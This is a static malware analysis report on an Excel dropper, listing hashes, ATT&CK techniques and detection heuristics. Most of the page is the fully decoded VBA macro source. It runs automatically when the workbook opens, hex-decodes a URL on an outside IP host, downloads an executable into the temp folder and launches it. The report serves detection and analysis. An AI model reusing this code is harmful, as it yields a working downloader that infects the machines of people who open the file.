Xls.Dropper.Agent-7623200-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 a537774596d7ac16…

MALICIOUS

Office (OLE)

46.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-02-05
MD5: 3cc59cb545020d0d44c8ec9e7e04dc25 SHA-1: 1a8f8aa0fad3be7faeffc9fab741bd1f727f6290 SHA-256: a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df
386 Risk Score

Malware Insights

Xls.Dropper.Agent-7623200-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The file contains obfuscated VBA macros that leverage the URLDownloadToFile API to download a second-stage payload. The presence of AutoOpen and Workbook_Open macros, along with critical heuristic firings for shell execution and URL downloading, strongly indicates a dropper functionality. The ClamAV detection name further supports this classification.

Heuristics 11

  • ClamAV: Xls.Dropper.Agent-7623200-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7623200-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7762 bytes
SHA-256: fceeccbdc374a3d6952d2b0b71e4eaa31b3ae2ebaa09091990035a7440a5935d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
65 of 113 identifiers look randomly generated (e.g. 'UJeTKZjRRErSpBP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As LongPtr) As LongPtr
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As Long) As Long
#End If


Sub werwehytef()
Dim QOBXhmAl As Integer
For QOBXhmAl = 0 To 3
Dim kXJALATO As Integer
For kXJALATO = 0 To 5
Dim DwptkYLg As Integer
For DwptkYLg = 0 To 9
DoEvents
Next DwptkYLg
DoEvents
Next kXJALATO
Dim tlwoFgep As Integer
For tlwoFgep = 0 To 3
DoEvents
Next tlwoFgep
DoEvents
Next QOBXhmAl
Dim vtRZaliF As Integer
For vtRZaliF = 0 To 6
Dim pHKvosSI As Integer
For pHKvosSI = 0 To 4
DoEvents
Next pHKvosSI
DoEvents
Next vtRZaliF
Dim flWdzivJ As Integer
For flWdzivJ = 0 To 7
DoEvents
Next flWdzivJ
sdfsdwee
End Sub
Sub AutoOpen()
Dim VpUsliln As Integer
For VpUsliln = 0 To 2
Dim SAYlUiXp As Integer
For SAYlUiXp = 0 To 6
Dim XlKwlndr As Integer
For XlKwlndr = 0 To 5
DoEvents
Next XlKwlndr
DoEvents
Next SAYlUiXp
Dim NWWpsxNd As Integer
For NWWpsxNd = 0 To 8
DoEvents
Next NWWpsxNd
DoEvents
Next VpUsliln
Dim HrOinrOl As Integer
For HrOinrOl = 0 To 6
Dim MRKwlEzM As Integer
For MRKwlEzM = 0 To 7
DoEvents
Next MRKwlEzM
DoEvents
Next HrOinrOl
Dim VuWpsbFr As Integer
For VuWpsbFr = 0 To 8
DoEvents
Next VuWpsbFr
    werwehytef
End Sub
Sub Workbook_Open()
Dim fkNGSJaZ As Integer
For fkNGSJaZ = 0 To 1
Dim vofHhwnj As Integer
For vofHhwnj = 0 To 6
Dim WZzOiENz As Integer
For WZzOiENz = 0 To 1
DoEvents
Next WZzOiENz
DoEvents
Next vofHhwnj
Dim UedLuKbT As Integer
For UedLuKbT = 0 To 8
DoEvents
Next UedLuKbT
DoEvents
Next fkNGSJaZ
Dim vrUjKxcT As Integer
For vrUjKxcT = 0 To 6
Dim fkaGOdrn As Integer
For fkaGOdrn = 0 To 5
DoEvents
Next fkaGOdrn
DoEvents
Next vrUjKxcT
Dim itRnfloL As Integer
For itRnfloL = 0 To 3
DoEvents
Next itRnfloL
    werwehytef
End Sub
Sub sdfsdwee()
Dim nKOyHRKO As Integer
For nKOyHRKO = 0 To 7
Dim fjaGYIub As Integer
For fjaGYIub = 0 To 1
Dim DcXpaUZB As Integer
For DcXpaUZB = 0 To 3
DoEvents
Next DcXpaUZB
DoEvents
Next fjaGYIub
Dim nVumNXzZ As Integer
For nVumNXzZ = 0 To 1
DoEvents
Next nVumNXzZ
DoEvents
Next nKOyHRKO
Dim kLrEvRLI As Integer
For kLrEvRLI = 0 To 2
Dim KJSNNToS As Integer
For KJSNNToS = 0 To 7
DoEvents
Next KJSNNToS
DoEvents
Next kLrEvRLI
Dim SRhPEQft As Integer
For SRhPEQft = 0 To 5
DoEvents
Next SRhPEQft
HBBJK = BUHVugrue("6874")
hkhnioki = BUHVugrue("74703A2F2F")
hojdsfg = BUHVugrue("3133362E3234332E3233372E3230343A383038302F6D6F7073692F706F7073692E706870")
    uyVUHjdg = HBBJK + hkhnioki + hojdsfg
Dim lGxtiFPa As Integer
For lGxtiFPa = 0 To 2
Dim eEwdmMHl As Integer
For eEwdmMHl = 0 To 5
Dim QYosYDRG As Integer
For QYosYDRG = 0 To 2
DoEvents
Next QYosYDRG
DoEvents
Next eEwdmMHl
Dim vulxTzrl As Integer
For vulxTzrl = 0 To 9
DoEvents
Next vulxTzrl
DoEvents
Next lGxtiFPa
Dim uyvadHZZ As Integer
For uyvadHZZ = 0 To 6
Dim MYIgMYac As Integer
For MYIgMYac = 0 To 1
DoEvents
Next MYIgMYac
DoEvents
Next uyvadHZZ
Dim lSPogoeg As Integer
For lSPogoeg = 0 To 6
DoEvents
Next lSPogoeg
    oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
Dim AFzUlTGV As Integer
For AFzUlTGV = 0 To 9
Dim ysVaDJCV As Integer
For ysVaDJCV = 0 To 7
Dim lFAFtXdl As Integer
For lFAFtXdl = 0 To 2
DoEvents
Next lFAFtXdl
DoEvents
Next ysVaDJCV
Dim UtrTsIYm As Integer
For UtrTsIYm = 0 To 5
DoEvents
Next UtrTsIYm
DoEvents
Next AFzUlTGV
Dim NBASjVzj As Integer
For NBASjVzj = 0 To 8
Dim eRlvndEb As Integer
For eRlvndEb = 0 To 6
DoEvents
Next eRlvndEb
DoEvents
Next NBASjVzj
Dim kWWhUBVb As Integer
For kWWhUBVb = 0 To 9
DoEvents
Next kWWhUBVb
    eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&)
   Dim pHUdsfd
Dim mAYkCQMj As Integer
For mAYkCQMj = 0 To 8
Dim TfgSUebU As Integer
For TfgSUebU = 0 To 4
Dim lIaKjaFk As Integer
For lIaKjaFk = 0 To 2
DoEvents
Next lIaKjaFk
DoEvents
Next TfgSUebU
Dim IBADqvaD As Integer
For IBADqvaD = 0 To 5
DoEvents
Next IBADqvaD
DoEvents
Next mAYkCQMj
Dim lFbXYkVq As Integer
For lFbXYkVq = 0 To 2
Dim bzGSzOfn As Integer
For bzGSzOfn = 0 To 3
DoEvents
Next bzGSzOfn
DoEvents
Next lFbXYkVq
Dim zFnLDitd As Integer
For zFnLDitd = 0 To 6
DoEvents
Next zFnLDitd
    pHUdsfd = Shell(oGYUIgiu, 1)

End Sub


Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String
For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2
Dim GCYINvKW As Integer
For GCYINvKW = 0 To 9
Dim GBcmygBP As Integer
For GBcmygBP = 0 To 4
Dim VBWAuLfD As Integer
For VBWAuLfD = 0 To 7
DoEvents
Next VBWAuLfD
DoEvents
Next GBcmygBP
Dim hXiYEAvI As Integer
For hXiYEAvI = 0 To 2
DoEvents
Next hXiYEAvI
DoEvents
Next GCYINvKW
Dim XupwfuAF As Integer
For XupwfuAF = 0 To 5
Dim nUCwEhDX As Integer
For nUCwEhDX = 0 To 3
DoEvents
Next nUCwEhDX
DoEvents
Next XupwfuAF
Dim RpNpxsby As Integer
For RpNpxsby = 0 To 4
DoEvents
Next RpNpxsby
OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2)))
Dim DuDiCbga As Integer
For DuDiCbga = 0 To 6
Dim KYaocdyh As Integer
For KYaocdyh = 0 To 1
Dim WdSgkWrx As Integer
For WdSgkWrx = 0 To 1
DoEvents
Next WdSgkWrx
DoEvents
Next KYaocdyh
Dim OSNdzeBF As Integer
For OSNdzeBF = 0 To 8
DoEvents
Next OSNdzeBF
DoEvents
Next DuDiCbga
Dim pRddMWhq As Integer
For pRddMWhq = 0 To 2
Dim MxHzzJfz As Integer
For MxHzzJfz = 0 To 1
DoEvents
Next MxHzzJfz
DoEvents
Next pRddMWhq
Dim UVNdayDT As Integer
For UVNdayDT = 0 To 1
DoEvents
Next UVNdayDT
qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw
Next GAqVffe
Dim JOHXGwzq As Integer
For JOHXGwzq = 0 To 6
Dim iMLSjCiD As Integer
For iMLSjCiD = 0 To 6
Dim ToNdaoAx As Integer
For ToNdaoAx = 0 To 8
DoEvents
Next ToNdaoAx
DoEvents
Next iMLSjCiD
Dim vCRVRgYG As Integer
For vCRVRgYG = 0 To 6
DoEvents
Next vCRVRgYG
DoEvents
Next JOHXGwzq
Dim iGddLVrz As Integer
For iGddLVrz = 0 To 6
Dim tqkMiOqQ As Integer
For tqkMiOqQ = 0 To 3
DoEvents
Next tqkMiOqQ
DoEvents
Next iGddLVrz
Dim JQZruVPf As Integer
For JQZruVPf = 0 To 1
DoEvents
Next JQZruVPf
BUHVugrue = qwsEHVrtCMHkAS
End Function








Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.